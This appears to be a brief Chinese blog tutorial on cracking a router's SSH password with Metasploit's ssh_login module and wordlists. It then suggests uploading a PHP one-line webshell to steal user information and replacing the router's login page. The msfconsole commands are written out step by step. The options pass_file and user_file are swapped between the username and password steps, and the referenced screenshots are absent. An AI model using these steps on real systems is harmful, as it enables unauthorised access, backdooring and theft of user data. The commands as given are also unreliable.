Msfconsole爆破ssh

                         Msfconsole爆破ssh

一：什么是ssh
Ssh为linux系统下的远程登录命令。好比windows下的远程桌面。登录ssh后可以对服务器进行相关的操作！
二：端口扫描 目标发现
1：用namp 或者netcat扫描网络，发现我的路由器是开启了ssh服务2：用netcap扫描

三：msfconsole破解密码
1：msfconsole运行
2：加载模块
use auxiliary/scanner/ssh/ssh_login

3：加载目标ip
Set rhosts 192.168.5.1

4:加载用户名
默认情况下用户名为root
直接执行 set username root 即可、
若默认用户名修改，需要加入字典破解
Set pass_file pass.txx
下图为准备的用户名字典
设置为字典破解

5：设置密码字典
Set user_file user.txt

6：开始破解
执行命令 run
7:成功破解

用户名和密码分别为 root 和admin
四：ssh登录

成功登录
五:ssh能干什么
1：可以给路由器中上传木马
如将本地写好的shell木马上传到路由器中获取用户信息
下图为php写的一句话木马

我们上传到路由器中的

Ok 我们连接我们的木马
2：自定义路由器的登录页面